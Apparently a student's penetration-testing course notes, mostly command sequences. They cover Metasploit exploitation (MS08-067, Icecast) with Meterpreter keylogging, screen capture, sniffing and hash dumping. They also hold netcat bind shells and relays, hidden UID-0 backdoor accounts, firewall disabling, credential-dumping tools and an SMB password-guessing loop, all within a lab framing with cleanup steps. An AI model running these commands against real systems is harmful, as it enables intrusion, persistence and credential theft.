cd /home/tools/framework-3.3.3/modules/payloads/stagers/windows
ls

• bind_tcp: Listen on a TCP port for new connection
• findtag_ord: Use existing TCP connection that exploit was delivered over
• reverse_tcp: Make a reverse connection from target back to attacker
• reverse_ord_tcp: Make reverse connection using ws2_32.dll already loaded into memory of exploited process
• passivex: Run ActiveX control in IE for reverse HTTP communications

• 1 Attacker delivers exploit with PassiveX loader
• 2 Reconfigs IE, runs IE, and fetches URL
• 3 HTTP Request
• 4 Response is ActiveX control called PassiveX stager, which loads stage such as the Meterpreter or VNC
• 5 Meterpreter or VNC uses PassiveX stager running inside of IE to get commands from attacker via HTTP

cd /home/tools/framework-3.3.3/modules/payloads/stages/windows
ls

• dllinject: Inject arbitrary DLL into target memory
• upexec: Upload and run an executable
• shell: Windows cmd.exe shell
• vncinject: Virtual Network Computing remote GUI control
• Meterpreter: Flexible specialized shell environment

• Change to the framework directory and:

# svn update

• use MS08-067 against 10.10.10.10
  • Vulnerability in the Server service
  • gives attacker local SYSTEM privileges

# cd /home/tools/framework-3.3.3

rells our shell to run a version of the Ruby environment compatible with this version of metasploit

# source /opt/usenewruby.sh
# ./msfconsole
msf > 

because of a bug in the way metasploit handles color:

msf > color false

msf > show exploits

msf > search -t exploit -r great smb

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options

• RHOST and LPORT are significant here
• “back” command in the MSF console will back out of a payload

• “normal” operating system commands can be run from the console, like ping

msf exploit(ms08_067_netapi) > ping -c 4 10.10.10.10

msf exploit(ms08_067_netapi) > set RHOST 10.10.10.10
msf exploit(ms08_067_netapi) > set LPORT [number]

msf exploit(ms08_067_netapi) > exploit
C:\WINNT\system32>hostname
hostname
trinity

msf exploit(ms08_067_netapi) > sessions -l

msf exploit(ms08_067_netapi) > sessions -i [N]

• CTRL-Z will prompt you to background the session
• CTRL-C will drop the session altogether

C:\WINNT\system32>exit
exit
^C
Abort session 1? [y/N] y

[*] Command shell session 1 closed
msf exploit(ms08_067_netapi) > exit
#

• Metasploit Interpreter = Meterpreter
• A Metasploit payload that acts as a specialized shell running inside the memory of a metasploit-exploited process
  • most of the hard-core development work in the Meterpreter is by Skape
• Consists of a series of DLL's injected into the process's memory
  • No separate process created
  • Currently focused on Windows targets
    • Work ongoing in development of Meterpreter for Linux (called Meterpretux) and for Mac OS X (called Machterpreter)

tasklist

To get a list of all DLL's loaded into all processes on a Windows XP, 2003, Vista or 2008 Server:

tasklist /m
tasklist /m metserv.dll
* since it is memory resident, it disappears on reboot.

How does a task not show up in tasklist?  This happened with a program in class, but killall got rid of it.

• ? / help: Display a help menu
• exit / quit: Quit the Meterpreter
• sysinfo: Show name, OS Type
• shutdown / reboot: Self-explanatory
• reg: read or write to the Registry

• cd: navigate directory structure
• lcd: change local directories on attacker machine
• pwd / getwd: Show the current working directory
• ls: List the directory contents
• cat: Display a file's contents
• download / upload: Move a file to or from the machine
• mkdir / rmdir: Make or remove directories
• edit: Edit a file using default editor (typically vi)

• getpid: Returns the process ID that Meterpreter is running inside
• getuid: Returns the user ID that the Meterpreter is running with
• ps: Process list
• kill: Terminate a process
• execute: Run a given program
• migrate: Jump to a given destination process ID
  • Target process must have the same or lesser privileges
  • My be a more stable process
  • When inside the process, can access any files that is has a lock on

• ipconfig: Show interface information
• portfwd: Forward packets for a local TCP port to another system on a different TCP port
• route: Manage the systems' routing table

• The Meterpreter offers a couple of features associated with the target machine's console user interface:
  • Show how long the user at the console has been idle

meterpreter > idletime

• Turn on or off user input devices:

meterpreter > uictl  [enable/disable] [keyboard/mouse]

• Can really mess with a user
• Dangerous for use in most penetration tests

• The Meterpreter also includes a keystroke logger
  • Invoked with the keyscan_start command
  • Then, access ekystrokes with keyscan_dump command

meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

• Metasploit 3.x includes a “route” command to pivot through already-exploited host via a Meterpreter session
  • Carries follow-on exploits and payloads across Meterpreter session
  • Don't confuse this with the Meterpreter “route” command, which manages routing tables on system running Meterpreter

msf > use [exploit]
msf > set RHOST [victim1]
msf > set PAYLOAD windows/meterpreter/bind_tcp
msf > exploit
meterpreter > (CTRL-Z to background session... will display meterpreter sid)
msf > route add [victim2_subnet] [netmask] [sid]
msf > use [exploit2]
msf > set RHOST [victim2]
msf > set PAYLOAD [payload2]
msf > exploit

• The Core and Stdapi modules loaded by default are powerful
• But other modules provide very useful capabilities for the tester
  • Located under the framework directory, under data/meterpreter
• To load additional modules:

meterpreter > use [modulename]

To load the ext_server_priv.dll:

meterpreter > use -m Priv

• Additional functionality will appear
• ? / help will be expanded to include the new capabilities

• Two command implemented in Priv module:
  • hashdump - Dump the SAM databas in a form suitable for cracking
  • timestomp - Alter the MACE dates/times associated with a file
    • M=Modified (last written)
    • A=Accessed
    • C=Created
    • E=MFT Entry ( Master File Table stores metadata about a file, such as it's name(unicode and 8.3 DOS-style), size, and security settings

• The espia module pulls screenshots, webcam frames, and microphone audio from the target machine running Meterpreter

meterpreter > screenshot [filename.bmp]
meterpreter > dev_image
meterpreter > dev_audio [n seconds]

• The “dev” commands are in development & are currently ustable

• The Meterpreter also includes a sniffer module
• Adds several commands:
  • sniffer_interfaces
  • sniffer_start
  • sniffer_stats
  • sniffer_dump
  • sniffer_stop
• Allows the attacker to pull down a libpcap-style packet capture file

meterpreter > user sniffer
meterpreter > sniffer_interfaces
meterpreter > sniffer_start 1
meterpreter > sniffer_dump 1 remotecapture.pcap
meterpreter > sniffer_stop 1

• 0 Install Icecast 2.0.0
• 1 Configure Metasploit to exploit icecast
• 2 Send Exploit and Meterpreter sending the reverse_tcp stager as a payload with Meterpreter stage
• 3 Reverse Meterpreter Shell runs in Icecast process memory
• 4 Use Meterpreter to access victim machine

mkdir c:\icecasttemp

• Select destination directory

• control Pannel→System→Advanced→Performace→Settings→Data Execution Prevention
• Turn on DEP for all programs and services except those I select
• Click add
• c:\icecasttemp\icecast2.exe
• reboot

# cd /home/tools/framework-3.3.3
# source /opt/usenewruby.sh
# ./msfconsole
msf > color false
msf > search icecast

msf > use exploit/windows/http/icecast_header
msf exploit(icecast_header) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(icecast_header) > show options

msf exploit(icecast_header) > set RHOST [Your_Windows_IP_Address]
msf exploit(icecast_header) > set LHOST [YourLinuxIPaddr]
msf exploit(icecast_header) > set TARGET 0

• run as administator on Windows 7

msf exploit(icecast_header) > service iptables stop
c:\> ping [YourLinuxIPaddr]
msf exploit(icecast_header) > exploit

msf exploit(icecast_header) > sessions -l
msf exploit(icecast_header) > sessions -i 1
meterpreter >

meterpreter > sysinfo
meterpreter > getuid
meterpreter > ps (note the ProcessID for icecast2.exe)
meterpreter > help

meterpreter > cd c:\
meterpreter > pwd
meterpreter > ls
meterpreter > cd c:\icecasttemp
meterpreter > ls

meterpreter > edit testfile.txt
meterpreter > cat testfile.txt

download file to Linux machine

meterpreter > download testfile.txt /tmp

in another window on the Linux machine:

# cat /tmp/testfile.txt

meterpreter > execute -f cmd.exe -c
Process 3830 created.
Channel 6 created.
meterpreter > interact 6
...
c:\icecasttemp>hostname
hostname 
VistaLab

c:\icecasttemp>ipconfig
ipconfig
...
c:\exit
meterpreter >

• Note that the cmd.exe window appeared on Windows GUI while it was running. To make the program run in a hidden mode, the execute command can be run with a -H option for “hidden”
• the execute command is nice an flexible, in that it allows us to run any program we want, channelizing its Standard Input and Standard Output

• To simply run a command shell in hidden mode, that channelizes and connects, this is all that is needed:

meterpreter > shell
C:\> hostname
C:\> ipconfig
C:\> dir
C:\> exit
meterpreter >

meterpreter > use sniffer
meterpreter > sniffer_interfaces
meterpreter > sniffer_start [N]
c:\> ping [YourLinuxIPaddr]

back on the Linux system, dump the captured packets into a PCAP file

meterpreter > sniffer_dump [N] /tmp/vmnet1.pcap
meterpreter > sniffer_stop [N]

In another terminal window:

# wireshark /tmp/vmnet1/pcap

meterpreter > use espia
meterpreter > screeshot /tmp/my_screen.bmp

After the espia module takes the screenshot, you should see an image of your Windows screen open in the Firefox browser.

• We will now migrate the Meterpreter DLL on the exploited machine from one process to another. We'll jump from icecast2.xe proccess into a notepad.exe process on our Windows machine

get current process ID

meterpreter > getpid

find notepad.exe

meterpreter > ps

jump to the new process

meterpreter > migrate [destination_process_ID]

may take several seconds to work, then get the new process ID

meterpreter > getpid

it should be notepad

meterpreter > keyscan_start

Type some text into the notepad window

meterpreter > keyscan_dump

It may skip or reverse charaters, especially if someone types really fast

meterpreter > keyscan_stop

meterpreter > exit
msf exploit(icecast_header) > exit
#

• restore DEP settings and reactivate security software

• Stop Icecast server
• Stop Icecast program

C:\> c:\icecasttemp\unins000.exe

c:\> rmdir /s c:\icecasttemp

• command shell access != terminal access
• Terminal control sequences in Standar Output can mess up a shell…
• …and a shell can mess up commands that rely on these control sequences.
• This issue often manifests itself with commands that:
  • clear the screen
  • Turn echo on or off
  • Formulate columns in output
  • Have other strange interactions with Standard Output
• Shell access gives the tester the ability to send commands to a target (as raw Standard Input to a shell) and get responses back (as raw Standard Output from the shell). Terminal access is usually obtained via telnet, Secure Shell (ssh), or other formal login mechanism.
• Terminal access to the target is much more intelegent, adapting output based on the screen-size and character set of the terminal.

• Various useful items in Standard Input could cause problems for a terminal-less shell
• CTRL-C is a big one, wspecially within Netcat
  • Causes Netcat client to drop a connection
  • The shell may be lost, and re-invoking it could take valuable time (seconds to hours)
• Also, CTRL-D, CTRL-Z, CTRL-[, and CTRL-]

• Illustrated using Netcat to get shell access to our machines
• Start a backdoor on Windows:

C:\> nc -L -p 2222 -e cmd.exe

• -L makes it persistent across connections (Listen Harder)
• -p on port 2222
• -e execute a command shell

• This give merely shell access

# nc 10.10.10.76.2 2222

Display the computer name

C:\> hostname

Display who the current user is

C:\> set username
C:\> dir

• also ipconfig and cd

The clear screen commands will not clear the screen, but instead send the control characters to the shell

C:\> cls

Edit will not work either

C:\> edit file.txt

close the editor by hitting Esc, then ALT-F, and then X. Move to NO and hit Enter.

This command will fall through the password prompt.

runas /u:administrator cmd.exe

List of running processes:

C:\> wmic process list full

List all Windows services:

C:\> sc query

List status of Telnet service:

C:\> sc qc tlntsvr

this hangs the shell

C:\> sc
C:\> sc /?

• sc works fairly well but changes as Windows issues patches

# nc -l -p 4444 -e /bin/sh

C:\> cd c:\tools
C:\tools> nc 10.10.10.75.2 4444

no command prompt is displayed, but commands can still be issued

uname -a
whoami
ls

other commands: ifconfig, cd

• To determine if you have mere shell access or a true terminal on a Linux or Unix environment, you could type:

tty

• If you see a /dev entry, that is your current tty and you have a terminal
• If you see “not a tty”, you just have a shell

• These don't work well because they require terminal control sequences

vi
emacs file.txt
man ls

These put the password prompt on the wrong terminal:

su
sudo

works fine

whoami
su - student

This won't work at all:

su -
whoami

this prompts the password on the wrong machine and you cannot enter a password through the client

sudo /bin/sh

• Telnet and ssh clients expect that they are being run from a terminal
  • Especially to escape entry of a password
  • Thus, authentication via telnet or ssh from a raw shell can be a problem

• Attacker –shell access–> Conquered Target –telnet or ssh–>Next Target
• If you have extra time during this exercise, run Netcagt on Windows → Netcat shell on Linux → telnet or ssh to 10.10.10.50

• Command-by-command workarounds
  • avoid problem commands
  • use similar commands that provide similar results
• Use shell access to enable terminal access
  • involves changing configuration of machine
• The second method is best for long term access, but it has baggage - it could involve system reconfiguration and/or the introduction of security weaknesses

• test commands on a local system with the same Windows version as the target to verify how each command behaves

^ Command ^ Purpose ^ Possible Workaround(s) ^

* echo in windows does not need quotes (“ ”) around the text–it will also echo the quotes

• Remote terminal access on a Windows machine can be done with several options
  • Activate telnet service
  • Activate remote desktop / terminal services
  • Install SSH daemon
  • Install VNC
• Be careful with any of these
  • they change the configuration
  • You may introduce a new security flaw
  • A malicious attacker may piggy-back in on your new access
  • Clean up when done - shutdown services and uninstall

• Activating Windows telnet service and making it useful involves several steps
  • Enable the service
  • Configuring an account to use the telnet service
  • Configuring the Windows firewall to allow the inbound access
  • WATCH OUT! Clear-text authentication
• Check current status of service:

C:\> sc query tlntsvr

• Change startup type to demand (a manually started service)(watch picky syntax):

C:\> sc config tlntsvr start= demand

• Turn service on:

C:\> sc start tlntsvr

• Also:

c:\> pkgmgr /iu:”TelnetClient”
c:\> pkgmgr /iu:”TelnetServer
c:\> To uninstall, use /uu:

meterpreter > run gettelnet

• Make sure you have an account

C:\> net user [username] [password] /add

• Put account in the TelnetClients group:

C:\> net localgroup TelnetClients /add
C:\> net localgroup TelnetClients [username] /add

• Configure firewall to allow inbound access on TCP 23

C:\> netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = [yourIPaddress]

• similar to telnet
• Check current status of service

C:\> sc query termservice

• Change startup type to demand (a manually started service):

C:\> sc config termservice start= demand

• Turn service on

C:\> sc start termservice

• Set registry key to enable terminal services access:

C:\> reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnextions /t reg_dword /d 0

• another option:

meterpreter > run getgui

• Check to see if it is listening:

C:\> netstat -na | find "3389"

• Make sure you have an account to login to the machine:

C:\> net user [username] [password] /add

• Put account in the “Remote Desktop Users” group:

C:\> net localgroup "Remote Desktop Users" [username] /add

• Configure firewall to allow inbound access for RDP:

C:\> netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = [yourIPaddress]

• To get sshd, you could install all of Cygwin, but that is a lot of software and overhead
• Instead, you could insall a minimal OpenSSH for Windows, that includes SSH, SCP, SFPT functionality
• Freely available at sshwindows.sourceforge.net
  • A gui-based wizard installer package :(
  • But, we only have shell access, so we can't use GUI installer

• Getting around the GUI-based installer wizard dilemma:
  • Install the package locally in lab, watching installation with Microsoft Sysinternals Filemon and Regmon
  • Grab all associated EXE's and DLL's from installation on lab system
  • Use the reg /export command to get a copy of all registry keys set by the installation package on lab system
  • Copy files to target box and use reg /import command to import reg keys
• Don't forget to configure the firewall to allow inbound TCP port 22

C:\> netsh firewall add portopening protocol - TCP port = 22 name = sshd mode = enable scope = custom addresses = [yourIPaddr]

• VNC provides remote GUI access of a target system
  • Client and server available for Windows or Linux/Unix
• VNC access to a Windows target machine can be achieved using:
  • A Metasploit VNC payload (if the target system has an exploitable vulnerability), or
  • Installation of VNC from a command shell

• Within Metasploit, the vncinject stage can use any of the stager options, resulting in:
  • vncinject/bind_tcp: Listen on chosen TCP port
  • vncinject/reverse_tcp: Reverse shell back to attacker
  • vncinject/reverse_http: Use PassiveX running inside of IE to carry VNC traffic back to attacker
  • vncinject/find_tag: Use existing communications session to carry traffic
  • vncinject/reverse_ord_tcp: Use Windows library already in exploited Windows process for communication back to attacker

• First, install VNC on a Lab system
• Then configure

C:\> "c:\Program Files\RealVNC\VNC4\vncconfig.exe" -service

• Set password and limit unbound IP addresses
• Change listening port if you want
• Make sure you delete the default “+” Then, add “Allow” your_IP/255.255.255.255 And “Deny” 0.0.0.0/0.0.0.0
• Export the registry settings from the lab machine:

C:\> reg export HKLM\Software\RealVNC\WinVNC4 vncfile.reg

• Grab a copy of two file in c:\Program Files\RealVNC\VNC4
  • winvnc4.exe and wm_hooks.dll
• Then, on the target machine, prepare the appropriate directories:

C:\> mkdir c:\Program Files\RealVNC
C:\> mkdir c:\Program Files\RealVNC\VNC4

• Copy windvnc4.exe and wm_hooks.dll to this directory

• Import registry file settings:

C:\> reg import vncfile.reg

• Register and start the service:

C:\> cd "C:\Program Files\RealVNC\VNC4"
C:\> winvnc4.exe -register
C:\> winvnc4.exe -start

• You can verify it is running:

C:\> netstat -na |find "5900"

• Tweak the local firewall as needed using netsh for TCP port 5900 or a custom port you configured

C:\> netsh firewall add portopening protocol = TCP port = 5900 name - vnc mode = enable scope = custom addresses = [yourIPaddress]

cat > file.txt <<EOF

• On Linux, some form of remote terminal access is likely already supported
  • Likely via SSH, or, possibly via telnet (although less likely today)
• Typically, you'll just have to add an account or two:

useradd -o -u 0 [login_name]
passwd

• Many Linux systems will let UID 0 account run the passwd command from a shell (not terminal) to change passwords… if not, use technique for altering /etc/shadow described on next slide
• Note that the default login for most telnet daemons do not allow UID 0 accounts to directly login
• Some sshds are configured to deny UID 0 logins as well (but not many)
• Thus, you may want to add a non-UID 0 accoutn too, used for login, followed by: # su - [login_name]

noclobber – prevents overwriting a file with >
echo stuff | tee foo  (this will allow the file to be overwritten with noclobber set.

echo "[login_name]:x:0:0:::/bin/bash" >> /etc/passwd
echo "[login_name]:\$1\$EluMoEqm\$vmSaGkfkPGJt0SvdMreEn.:13861:0:99999:7:::" >> /etc/shadow

• note the \ charaters in front of special charaters

• First, check to see if the system is using inetd or xinetd

# ps aux |grep inetd

• If inetd is being used, alter /etx/inietd.conf, adding a line:

telnet stream txp nowait root /usr/sbin/tcp in.telnetd

• Make sure /etc/services has a line that says:

telnet      23/tcp

• If the system uses xinetd, create a file in /etc/xinetd.d for the telnet service
  • Copy an existing file for an allowed service, and update it fo telnet, making sure it has:

disable = no
server = /usr/sbin/in.telnetd

• Then, send a HUP signal to inetd or xinetd:

# kill -HUP [processID]

• Unlike telnetd, sshd usually isn't started by inetd or xinetd
• It's usually started by a system initialization script link in /etc/rc*
• On systems with chkconfig command, you can configure it to startup at next reboot:

# chkconfig sshd on

• turns it on for runlevels 2,3,4,5 by default at next reboot
• On systems with service command, you can start it immediately:

# service sshd start

• On systems without chkconfig and service, invoke initialization script:

# /etc/init.d/sshd start

• Port relay tool, such as Netcat relay can get around some firewall rules
• reconfiguring sshd or telnet not needed

To invoke a relay on target machine:

mknod backpipe p
nc -l -p [allowed_inbound_port] 0<backpipe |nc 127.0.0.1 22 1> backpipe

To connect:

ssh login_name@[targetmachine] -p [allowed_inbound_port]

• set up a Netcat relay to forward SSH on our Linux systems
• Then, connect from Windows to the relay

# service iptables stop
C:\> putty.exe [LinuxIPaddr]

should work

# service iptables start
# iptables -A INPUT -s [YourWindowsIPaddr] -p tcp --dport 22 -j DROP
C:\> putty.exe [LinuxIPaddr]

should be denied

# iptables -I INPUT 1 -s 10.10.75.218 -p tcp –dport 4444 -j ACCEPT

test the firewall with a nc pair:

# nc -l -p 4444
C:\> nc [YourLinuxIPaddr] 4444

start a fifo on the Linux machine (On BSD, mkfifo)

# mknod backpipe p
# mc -l -p 4444 0<backpipe |nc localhost 22 1>backpipe

We are forwarding TCP connections that arrive on TCP port 4444 to the localhost system on TCP port 22, where ssh is listening

C:\> putty.exe [LinuxIPaddr] 4444

login and verify terminal access

# vi /tmp/stuff.txt

• run two sniffers to see what is happening

# tcpdump -nn -i eth0 port 4444
# tcpdump -nn -i lo port 22

# iptables -D INPUT -s [Windows_IP_address] -p tcp --dport 22 -j drop
# iptables -D INPUT -s [Windows_IP_address] -p tcp --dport 4444 -j ACCEPT
# iptables -n --list

• TFTP
  • unauthenticated, UDP port 69
  • Mosgt systems include TFTP client
• FTP
  • uses TCP 20 (data) and TCP 21 (control) by default
  • Corrects text file anomalies between different systems
• SCP, part of SSH suite
  • Encrypts data
  • Often allowed outbound, using port 22 by default
  • Included on most linux and Unix machines by default
• HTTP or HTTPS
  • Almost always allowed outbound on a least TCP 80 and 443
  • Even supports transfer through HTTP/HTTPS proxy
  • Command-line browser very helpful, like wget, Lynx, HTTrack

• Windows file Sharing - NetBIOS / SMB
• NFS mounts
• Netcat
  • Is it installed? If not, this is a checken-and-egg problem
• Others

• Metasploit Meterpreter upload and download function

meterpreter > upload
meterpreter > download
meterpreter > cat
meterpreter > edit

• A terminal session can paste file contents
• echo

$ echo "ths is part of the file >> file.txt
C:\> echo this is part of the file >> file.txt
C:\> copy con

• end-of-line characters
  • Linux/unix: Line Feed = LF = ASCII 0x0a = \n
  • Mac OS X: Carriage returen = CR = ASCII 0x0d = \r
  • Windows: Carriage return+Line Feed = CRLF = ASCII 0x0d0a = \r\n

$ unix2dos
$ dos2unix

Windows to Unix:

tr -d '\r' < windowsfile.txt > unixfile.txt

Mac OS X to Unix:

tr '\r' '\n' < macfile.txt > unixfile.txt

Unix to Mac:

tr '\n' '\r' < unixfile.txt > macfile.txt

• Additional scripts for converting with tr, awk, and perl are at http://kb.iu.edu/data/agiz.html

• Password representations
  • Unix/Linux: /etc/passwd /etc/shadow
  • Windows: SAM database and cached credentials using fgdump or at least currently logged on user's credentials (using whosthere.exe)

fgdump.exe
whosthere.exe

• Crypto keys
  • SSH keys for ssh clients and sshd - public and private keys
  • PGP and GnuPG keys - public and secret rings

• webcast Pillage the village on sans website

• Windows credentials cached in Microsoft Credential Manager
• creddump tool from http://www.okid.it/creddump.html
• Windows service account passwords stored in clear text in LSA secrets section of Registry
  • HKLM\Security\Policy\Secrets - but not directly readable or parsable from admin account
  • Instead, gather this information with free LSASecretsDump from
    • http://www.nirsoft.net/utils
• RSA SecureID Authentication Manager server seed files (.asc or .xml)
  • with these, Cain can calculate tokens' display at arbitrary points in the future

• Source Code
  • Especially for web servers. Locally, we can analyze it for vulnerabilities
  • Look through admin or other scripts for hard-coded passwords
• User's left-behind “password.txt files in desktop
• Wireless client profiles, including Pre-Shared Keys
  • Detailed in Josh Wright's pen test research paper “Vista Wireless Power Tools for the Penetration Tester” at www.inguardians.com
• PSK isn't currently crackable, but can be directly imported into pen tester's own system

• Machines with which the compromised system has recently communicated:

Windows:

C:\> netstat -na
C:\> arp -a
C:\> ipconfig /displaydns

Linux and Unix:

# netstat -natu
# arp -a

• Additional system-specific information:
  • DNS servers: Zone-files
  • Web servers: Document root, especially local scripts
  • Mail servers: E-mail address inventory, address aliases, sample of e-mail that tester sent to it
  • Clients: Inventory of software:

C:\> dir /s "c:\Program Files"

• significant market share
• include many third party applications
• often not patched, especially the applications

• use only built in tools to avoid detection and less cleanup

Display the contents of a file on Standard Output:

C:\> type [file]

Looking at multiple files:

C:\> type *.txt 
C:\> type [file1] [file2] [...]

Displaying output one page at a time:

C:\> more [file]

Searching for a string within a file:

C:\> type [file] | find /i "[string]"

Searching for regular expressions:

C:\> type [file] | findstr [regex]

Other stray commands:

ipconfig /displaydns
arp -a
netstat -nr

To see all environment variables set within a shell:

C:\> set

To see a specific one:

C:\> set [variable_name]

or

C:\> echo %varname% %computername%

Some important environment variables for penetration testers and ethical hackers:

C:\> set username (almost like whoami)
C:\> set path

systemroot is important in case the root is not c:\. These are similar commands:

set systemroot
echo %systemroot%

also one can do this to display the present working directory:

cd %systemroot%
cd

pwd is:

cd

search fo a file in the filesystem

dir /b /s [directory]\[file] (no spaces)

• /s means recur(s)e
• /b means bare form of output and print full path if used with /s

search for hosts file in system root

C:\> dir /b /s %systemroot%\hosts

List local users:

C:\> net user

List local groups:

C:\> net localgroup

List members of local admin group

C:\> net localgroup administrators

Add a user:

C:\> net user [logon_name] [password] /add

Put the user in the local admin group

C:\> net localgroup administrators [logon_name] /add

• maintain a record of al changes and cleanup after done!

To remove a user from a group:

C:\> net localgroup [group] [logon_name] /del

To delete an account:

C:\> net user [logon_name] /del

netsh interacts with network settings

netsh /?
netsh firewall show config

command shift click on task in taskbar to elevate to admin

Allow a given port inbound

C:\> netsh firewall add portopening protocol = [protocol] port = [port] name = [comment] scope = custom addresses = [allowed_source_IP/cidr]

Example: to allow inbound TCP port 23 from 10.10.10.0/24:

C:\> netsh firewall add portopening protocol = TCP port = 23 name = AllowTelnet scope = CUSTOM addresses = 10.10.10.0/24

To delete the rule:

C:\> netsh firewall del portopening protocol = [TCP|UDP] port = [portnum]
C:\> netsh firewall del portopening protocol = TCP port = 23

To disable the Windows firewall altogether:

C:\> netsh firewall set opmode disable

“enable” will turn it back on

• The reg command lets us interact with the Registry (including remotely!)

read reg key:

C:\> reg query [KeyName]

Change a reg key

C:\> reg add [KeyName] /v [ValueName] /t [type] /d [Data]

Export settings to a reg file

C:\> reg export [KeyNmae] [filename.reg]

Import setting from a reg file

C:\> reg import [filename.reg]

Do any of these remotely by prepending

\\[MachineName before [KeyName]

requires Admin-level SMB session

other machines recently resolved

C:\> ipconfig /displaydns

machines recently communicated with

C:\> arp -a

Set up a session with the target (if you don't provide a password, it will prompt for it)

C:\> net use \\[targetIP] [password] /u:[username]

Mount a share

C:\> net use * \\[targetIP]\[share] [password] /u:[user]

i.e.

\\[targetIP]\c$

Some versions of windows require specifying the machine name vefore the user:

/u:[MachineName]\[user]

• Windows machines allow a user to have one SMB session with a given target machine as one username at a time only
• error messages result if multiple sessions attempted
• To avoid this, drop your session as one user first

C:\> net use \\[targetIP] /del

to drop all sessions

C:\> net use * /del

- enter Y to continue or add /y

C:\> net use * /del /y

• The Service Controller (sc) command lets you interact with services
• by default, works locally
• Or, follow it with \\[targetIP], and it can ride across an admin SMB session to take effect on a remote system

List running services:

C:\> sc query

List all services

C:\> sc query state= all

Detail on one service

C:\> sc qc [service_name]

Start a service:

C:\> sc start [service_name]

If the service type is disabled, first enable it

C:\> sc config [service_name] start= demand

To stop:

C:\> sc stop [service_name]

• Services run with a name that we interact with using sc

to list all of the service names

C:\> sc query state= all

gui

services.msc

WMIC

C:\> wmic service where (displayname like "%[whatever]%") get name
C:\> wmic service where (displayname like "%telnet%") get name

• FOR /L: counter
• FOR /F: Iterate over file contents, strings, or command output

• Counters

C:\> for /L %i in ([start],[step],[stop]) do [command]

run forever

C:\> for /L %i in (1,0,2) do echo Hello

simple counter

C:\> for /L %i in (1,1,255) do echo %i

i is always an integer

pause for 4 seconds between each iteration

C:\> for /L %i in (1,1,255) do echo %i & ping -n 5 127.0.0.1
C:\> for /L %i in (1,1,255) do echo %i & ping -n 5 127.0.0.1 > null

run multiple commands:

[command1] & [command2]

run command1, and only run command2 if command1 succeeds without error:

[command1] && [command2]

We usually don't want our command(s) displayed each time through the loop, prepend command with @ to turn off echoing of command

C:\> for /L %i in (1,1,255) do @echo %i & @ping -n 5 127.0.0.1

Redirect to nul

C:\> for /L %i in (1,1,255) do @echo %i & @ping -n 5 127.0.0.1 > null

Redirect Standard Error to nul

C:\> [command] 2>nul

save error messages by appending them to a file

C:\> [command] 2>>errorfile.txt

select output lines with a given string in them

... | find "[sting]"

print a blank line

C:\> echo.

beep

C:\> echo CTRL-G

• ping sweep of 10.10.10.1-255

C:\> for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

• not fast, but made entirely from the Windows command line

• FOR /F loops iterate over other things

C:\> FOR /F ["options"] %i in ([stuff]) do [command]

• can be:
  • contents of a file set:

C:\> for /F ["options"] %i in (file-set) do [command]

• string:

C:\> for /F ["options"] %i in ("string") do [command]

  command

C:\> for /F ["options"] %i in ('command') do [command]

• not used in this class
• eol=[c]: sets the end of line character (default hex 0x0d0a)
• skip=[n]: Skip these lines from the output (allows us to skip file headers)
• delims=[xxx]: Specifies a delimiter set (default delimiters are spaces and tabs) eg. “delims=,;”
• tokens=[x,y,m-n]: Specifies which element of the output will be passed to the do part for iteration; can be a list or range… if multiple balues set, variables beyond %i are automatically allocated
  • The first value in each line will be assigned to our variable (such as %i). Then, because ther is a second token, another variable will be automatically allocated, one letter higher than the first (%j), or ranges “tokens=[2-4]”, %i, %j, %k.
• usebackq
  • allows the single quote to be use in the command using ` to set off the command

C:\> for /f %i in (password.lst) do @echo %i & @net use \\[target_IP_addr] %i /u:[UserName] 2>nul && pause

• instead of pause, we could append our results to a file with

... && echo UserName: %i >> success.txt

• Use “echo [line] »” to build script line by line

C:\> echo [line] >> file.bat

• Simply convert any variables in For loops from %[var] into [var] C:\> for /L %i in (1,1,100) do @echo %i in a batch file: for /L i in (1,1,100) do @echo %%i

F7 command history

• In XP, telnet server is already installed.
• In Vista and Windows 7 , go to Control Panel, Programs and Features, Turn Windows Features on or off, and check Telnet Server
  • or use the Vista command

C:\> pkgmgr /iu:"TelnetServer"

Use the sc command to enable the telnet service on your Windows machine.

C:\> sc \\[hostname] query state= all | more

$ telnet [WindowsIPaddr]

• exit telnet session
• remove user fred from TelnetClients group
• delete user fred
• delete the TelnetClients group if you did create one
• stop the telnet service
• Change the telnet service startup to disabled
• re-enable firewall
• On Vista, remove telnet server in Control panel, Programs and Features

C:\> pkgmgr /uu:"TelnetServer"

• Write a FOR loop that will do a reverse DNS lookup of each IP address in the range 10.10.10.1-255 using 10.10.10.60 as the DNS server

nslookup [IPaddr] [DNS_Server_IPaddr]

• We can use Netcat as a port scanner

C:\> nc.exe -n -vv -w3 [targetIP] [startport-endport]

• nc.exe scans ports in reverse order. -r randomizes it within range

Scan TCP ports 1-90 (actually in reverse order) on 10.10.10.50

C:\> c:\tools\nc.exe-n -vv -w3 10.10.10.50 1-90

• Use nc.exe, but only scan ports TCP:21,22,23,25,53,80,135,443,6000

A single netcat command to connect to a single port:

C:\> c:\tools\nc.exe -n -vv -w3 [targetIP] [port]

• Hint: Create a file, ports.txt

C:\> echo 21 >> ports.txt
C:\> echo 22 >> ports.txt
C:\> echo 23 >> ports.txt
C:\> echo 25 >> ports.txt

• For user falken on 10.10.10.10, perform password guessing from the entries in the John password.lst file
  • use FOR /F, pausing on success

to change the startup type:

C:\> sc \\[hostname] config tlntsvr start= demand

to start the telnet service

C:\> sc \\[hostname] start tlntsvr

check if TelnetClients group exists

C:\> net localgroup TelnetClients

create the group if it does not exist

C:\> net localgroup TelnetClients /add

Add the user

C:\> net user fred [password] /add
C:\> net localgroup TelnetClients fred /add

from Linux

# telnet [YourWinIPaddr]

disable firewall if blocked

C:\> netsh firewall set opmode disable

test

C:\> hostname
C:\> set username

• Cleanup

Remove fred from the telnet group

C:\> net localgroup TelnetClients fred /del

Delete user fred:

C:\> net user fred /del

Remove the TelnetClients group

C:\> net localgroup Telnetclients /del

Stop the telnet service

C:\> sc \\[hostname] stop tlntsvr

Change the telnet service's startup type

C:\> sc \\[hostname] config tlntsvr start= disabled

Re-enable the firewall

